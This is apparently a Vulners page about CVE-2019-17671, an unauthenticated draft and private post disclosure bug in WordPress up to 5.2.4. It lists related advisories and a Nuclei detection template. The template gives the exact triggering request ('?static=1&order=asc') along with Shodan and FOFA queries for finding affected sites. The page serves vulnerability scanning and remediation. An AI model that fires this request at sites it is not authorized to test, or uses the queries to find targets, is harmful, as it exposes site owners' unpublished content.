| Reporter | Title | Published | Views | Family All 72 |
|---|---|---|---|---|
| WordPress Core 5.2.3 - Viewing Unauthenticated/Password/Private Posts Vulnerability | 20 Nov 201900:00 | – | zdt | |
| The vulnerability of the WordPress website content management system, related to the exposure of information, allows attackers to gain access to confidential data. | 7 May 202000:00 | – | bdu_fstec | |
| CVE-2019-17671 | 18 Jun 202210:22 | – | circl | |
| WordPress Information Disclosure Vulnerability (CNVD-2019-37381) | 18 Oct 201900:00 | – | cnvd | |
| CVE-2019-17671 | 17 Oct 201912:04 | – | cve | |
| CVE-2019-17671 | 17 Oct 201912:04 | – | cvelist | |
| [SECURITY] [DLA 1980-1] wordpress security update | 5 Nov 201916:38 | – | debian | |
| [SECURITY] [DSA 4599-1] wordpress security update | 8 Jan 202005:47 | – | debian | |
| [SECURITY] [DSA 4599-1] wordpress security update | 8 Jan 202005:47 | – | debian | |
| [SECURITY] [DSA 4677-1] wordpress security update | 6 May 202006:30 | – | debian |
id: CVE-2019-17671
info:
name: WordPress <= 5.2.4 - Unauthenticated View Private/Draft Posts
author: 0x_Akoko
severity: medium
description: |
WordPress before 5.2.4 contains an information disclosure caused by mishandling of the static query property, letting unauthenticated users view certain content, exploit requires no authentication.
impact: |
Unauthenticated users can view restricted content, leading to information disclosure.
remediation: |
Update to WordPress 5.2.4 or later.
reference:
- https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-523-security-and-maintenance-release.html
- https://core.trac.wordpress.org/changeset/46474
- https://nvd.nist.gov/vuln/detail/CVE-2019-17671
- https://seclists.org/bugtraq/2020/Jan/8
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2019-17671
cwe-id: CWE-200
epss-score: 0.36503
epss-percentile: 0.98298
cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.component:"wordpress" http.html:"status-draft"
fofa-query: body="Wordpress" && body="status-draft"
tags: cve,cve2019,wp,wordpress,unauth,disclosure
http:
- method: GET
path:
- "{{BaseURL}}/?static=1&order=asc"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'type-page status-draft'
- 'type-post status-draft'
condition: or
- type: regex
part: body
regex:
- 'class="[^"]*entry-title[^"]*"[^>]*>[^<]{3,}'
- 'WordPress ([0-4]\.|5\.[0-2]\.|5\.2\.[0-3])'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022040635986e86b4912715ff8e4c7c6c524748e6ef7878cb4a8db05c1554c5a7e47022100a2dee96d028eedce407cdf56b41c2a9766553ef79364154354a48496a264a097:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation